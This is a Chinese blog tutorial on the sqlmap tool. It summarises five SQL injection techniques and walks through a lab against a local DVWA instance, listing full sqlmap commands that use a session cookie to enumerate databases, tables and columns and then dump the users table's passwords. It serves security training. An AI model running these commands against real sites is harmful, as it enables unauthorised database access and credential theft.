首页 > 数据库 >SQLmap注入

SQLmap注入

时间:2024-06-02 23:29:08浏览次数:21  
标签:SQLmap sqlmap -- dvwa cookie Submit 注入

SQLmap注入

sqlmap只是用来检测和利用sql注入点,并不能扫描出网站有哪些漏洞,使用前先使用扫描工具扫出sql注入点。

sqlmap采用了五种独特的SQL注入技术。

1.布尔盲注:可以根据返回页面判断条件真假的注入。

2.时间盲注:不能根据返回页面的内容判断出任何信息,要用条件语句查询时间延迟语句是否已经执行(页面返回时间是否增加)来判断。

3.报错注入:页面会返回错误信息或者把注入的语句的结果直接返回到页面中。

4.联合查询注入:可以使用Union的情况下的注入。

5.堆注入:可以同时执行多条语句的执行时注入。

实训:
步骤1:使用sqlmap进行get型注入,cookie用于绕过登录页面
sqlmap -u 'http://192.168.1.130/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#' --cookie = 'security = low; PHPSESSID = 3j4urng144pl0lb4je3hue5hr7' --batch 
-- batch:选项全选yes
-u 指定目标的url

按住F12,进入开发者工具,点击storage.

显示:

步骤2:查看有哪些数据库
sqlmap -u 'http://192.168.1.130/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#' --cookie = 'security = low; PHPSESSID = 3j4urng144pl0lb4je3hue5hr7' --batch --dbs
步骤3:查看当前的数据库
sqlmap -u 'http://192.168.1.130/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#' --cookie = 'security = low; PHPSESSID = 3j4urng144pl0lb4je3hue5hr7' --batch --current-db
步骤4:查看数据库中所有的表
sqlmap -u 'http://192.168.1.130/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#' --cookie = 'security = low; PHPSESSID = 3j4urng144pl0lb4je3hue5hr7' --batch -D dvwa --tables
步骤5:查看user表里有哪些列
sqlmap -u 'http://192.168.1.130/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#' --cookie = 'security = low; PHPSESSID = 3j4urng144pl0lb4je3hue5hr7' --batch -D dvwa -T users --columns
步骤6:爆破表中的密码
sqlmap -u 'http://192.168.1.130/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#' --cookie = 'security = low; PHPSESSID = 3j4urng144pl0lb4je3hue5hr7' --batch -D dvwa -T users -C"user,password" --dump

标签:SQLmap,sqlmap,--,dvwa,cookie,Submit,注入
From: https://blog.csdn.net/m0_73528952/article/details/139399682

相关文章

  • MySQL注入之Fuzz测试&WAF Bypass小结
    目录BurpSuiteFuzz测试内联注释绕过union[]select联合查询绕过敏感函数绕过from[]information_schema查表报错注入示例常规绕过思路总结空格绕过引号绕过逗号绕过比较符号绕过逻辑符号绕过关键字绕过编码绕过等价函数绕过宽字节注入多参数请求拆分生僻函数输出内容过滤BurpSuite......
  • .NET Core IServiceCollection注入 拓展方法
    一般注入比较麻烦,可以不依赖第三方组件命名空间注入usingMicrosoft.Extensions.DependencyInjection;usingNewtonsoft.Json;usingSystem.Reflection;publicstaticclassServiceCollectionExtensions{publicstaticIServiceCollectionAddTransientFromNames......
  • Microsoft.Extensions.DependencyInjection会自动释放通过DI(依赖注入)创建的对象
    Microsoft.Extensions.DependencyInjection中(下面简称DI),在调用ServiceProvider和IServiceScope对象的Dispose()方法时,也会自动调用ServiceProvider和IServiceScope对象通过DI创建的对象的Dispose()方法(前提是,通过DI创建的对象实现了IDisposable接口)。我们新建一个.NETCore控制台......
  • SQL注入攻击
    一.什么是SQL注入分类:可回显的注入和不可回显的注入以及二次注入;(1)可回显的注入:可以联合查询的注入,报错注入;(2)不可回显的注入:Bool盲注,时间盲注;(3)二次注入;二.可以联合查询的SQL注入1.SQL语句中的$id变量该变量会将GET获取到的参数直接拼接到SQL语句中,如:?id=1'unionselect......
  • Navicat, PDManer,PyMySQL模块,SQL注入问题,PyMySQL进阶之主动提交事务
    ⅠNavicat【一】Navicat介绍Navicat可以充当很多数据库软件的客户端提供了图形化界面能够让我们更加快速的操作数据库【1】介绍Navicat是一款功能强大且广泛使用的数据库管理工具,可用于连接和管理多种数据库系统,如MySQL、MariaDB、Oracle、PostgreSQL等。本文将详细......
  • 0day倚栏听风网络存在SQL注入漏洞
     0x01阅读须知        技术文章仅供参考,此文所提供的信息只为网络安全人员对自己所负责的网站、服务器等(包括但不限于)进行检测或维护参考,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。利用此文所提供的信息而造成的直接或间接后果和损失,均由使用......
  • PTE笔记:SQL注入-报错注入
    适用于界面不回显的场景,通过注入语句在报错信息中回显我们想要的信息常用函数1:floor+rand配合count+groupby函数rand() 生成0-1之间的随机数,默认完全随机,加参数后固定随机(多次执行随机生成的数是固定的)floor()取整groupby()分组count()计数concat(字符串)拼接字符串group_......
  • ECShop电商商城wholesale_flow接口处存在SQL注入漏洞
    ECShop电商商城wholesale_flow接口处存在SQL注入漏洞FOFA语句app="ECSHOP"app="ECSHOP"&&icon_hash="-164358497"SQL注入漏洞POST/wholesale_flow.php?step=ajax_update_cartHTTP/1.1Host:User-Agent:Mozilla/5.0(WindowsNT10.0;Win64......
  • SQL 注入漏洞
    目录一、快速学习数据库查询操作二、SQL注入简介与危害三、SQL注入实战四、SQL注入分类 (1)Union注入适用条件注入步骤实战1、判断是否有注入点2、使用orderby查询回显列数 3.判断显示位置4.获得数据库名字5.获得数据库里面的表6.获得数据库对应表中的所......
  • 全国节能宣传周来了!天翼云电脑为绿色低碳注入科技动能!
    5月13日至19日是2024年全国节能宣传周活动,今年的主题为“绿色转型,节能攻坚”。在当今全球气候变化日益严峻的背景下,节能减排、绿色发展已成为全球共识。中国电信天翼云积极履行央企社会责任担当,践行绿色低碳发展理念,创新节能技术,打造天翼云电脑等系列产品,赋能千行百业低碳绿色发展......